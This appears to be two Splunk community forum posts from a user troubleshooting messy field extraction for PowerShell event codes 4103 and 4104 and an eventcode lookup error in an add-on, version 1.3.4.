This was VERY helpful - thanks!! I'm finding that the data Splunk ingests for PowerShell events (i.e. 4103, 4104) is very sloppy. Fields are not getting extracted, etc. Any idea on how I can resolve this? There doesn't seem to be a proper "Splunk_TA_PowerShell" with props.conf & tranforms.conf to clean up the PowerShell event data - am I wrong? Let me know if you know of a solution, or good resource. Thanks!
... View more
This is still an issue, and it looks like the "[eventcode]" trick you mentioned is already present in my transforms.conf file.
I'm using v1.3.4
Anyone else still experiencing this issue?
From the search log:
ERROR LookupDataProvider - Could not find all of the specified destination fields in the lookup table.
ERROR AutoLookupDriver - Could not load lookup='LOOKUP-eventcode' reason='Error in 'lookup' command: Could not find all of the specified destination fields in the lookup table.'
... View more